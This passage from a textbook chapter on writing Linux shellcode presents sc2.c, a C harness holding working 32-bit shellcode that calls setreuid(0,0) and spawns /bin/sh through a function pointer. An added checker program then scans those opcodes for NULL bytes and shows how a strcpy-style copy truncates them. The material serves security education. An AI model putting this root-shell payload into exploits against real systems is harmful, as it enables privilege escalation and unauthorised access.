If there are any NULL characters, the shellcode will fail when we place it into a string for injection during an exploit.
NOTE The output of objdump is provided in AT&T (gas) format. As discussed in Chapter 6, we can easily convert between the two formats (gas and nasm). A close comparison between the code we wrote and the provided gas format assembly shows no difference.
Testing the Shellcode
To ensure that our shellcode will execute when contained in a string, we can craft the following test program. Notice how the string (sc) may be broken into separate lines, one for each assembly instruction. This aids with understanding and is a good habit to get into.
$ cat sc2.c
// sc2.c: place the opcodes in a string and jump to it through a function pointer.
// sc lives in a writable data section, so on a system with non-executable data
// this must be built with gcc -z execstack (and -m32, since the code is 32-bit).
char sc[] = // white space, such as carriage returns, doesn't matter
    // setreuid(0,0)
    "\x31\xc0"             // xor %eax,%eax
    "\xb0\x46"             // mov $0x46,%al
    "\x31\xdb"             // xor %ebx,%ebx
    "\x31\xc9"             // xor %ecx,%ecx
    "\xcd\x80"             // int $0x80
    // spawn shell with execve
    "\x31\xc0"             // xor %eax,%eax
    "\x50"                 // push %eax
    "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
    "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
    "\x89\xe3"             // mov %esp,%ebx
    "\x50"                 // push %eax
    "\x53"                 // push %ebx
    "\x89\xe1"             // mov %esp,%ecx
    "\x31\xd2"             // xor %edx,%edx
    "\xb0\x0b"             // mov $0xb,%al
    "\xcd\x80";            // int $0x80   (;) terminates the string

int main(void)
{
    void (*fp)(void);        // declare a function pointer, fp
    fp = (void (*)(void))sc; // set the address of fp to our shellcode
    fp();                    // execute the function (our shellcode)
    return 0;
}
Gray Hat Hacking: The Ethical Hacker's Handbook, Part III, Chapter 10: Writing Linux Shellcode (pp. 219-220)
This program first places the hex opcodes (shellcode) into a buffer called sc[].
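As an added example (not from the book), the following C checker makes the NULL-byte rule above concrete: it scans the sc2.c opcodes for NULL bytes and contrasts them with a constructed variant in which the first mov $0x46,%al (b0 46) is replaced by the full-register form mov $0x46,%eax (b8 46 00 00 00), then shows how a strcpy-style copy truncates the string at the first NULL. The variant is for comparison only and is never executed.

```c
#include <stdio.h>
#include <string.h>

/* The same 35 opcode bytes as sc2.c above (setreuid(0,0) + execve). */
static const unsigned char good_sc[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

/* Constructed variant for comparison: "mov $0x46,%al" (b0 46) replaced
 * by the full-register form "mov $0x46,%eax" (b8 46 00 00 00). The 32-bit
 * immediate brings three NULL bytes with it. Not meant to be executed. */
static const unsigned char bad_sc[] =
    "\x31\xc0\xb8\x46\x00\x00\x00\x31\xdb\x31\xc9\xcd\x80";

/* Offset of the first NULL byte in buf, or -1 if there is none.
 * len must be the real byte count: sizeof(array) - 1 for a literal,
 * because the literal's own terminating NULL is not shellcode. */
int first_null(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return (int)i;
    return -1;
}

/* What survives a strcpy/strcat-style copy: everything up to the first
 * NULL. If this is shorter than the real length, the payload is cut. */
size_t bytes_surviving_strcpy(const unsigned char *buf)
{
    return strlen((const char *)buf);
}

/* 1 if the whole payload would survive string handling, else 0. */
int string_safe(const unsigned char *buf, size_t len)
{
    return first_null(buf, len) == -1 && bytes_surviving_strcpy(buf) == len;
}

int main(void)
{
    printf("sc2.c opcodes: %zu bytes, first NULL at %d, string-safe=%d\n",
           sizeof(good_sc) - 1, first_null(good_sc, sizeof(good_sc) - 1),
           string_safe(good_sc, sizeof(good_sc) - 1));
    printf("variant:       %zu bytes, first NULL at %d, %zu bytes survive\n",
           sizeof(bad_sc) - 1, first_null(bad_sc, sizeof(bad_sc) - 1),
           bytes_surviving_strcpy(bad_sc));
    return 0;
}
```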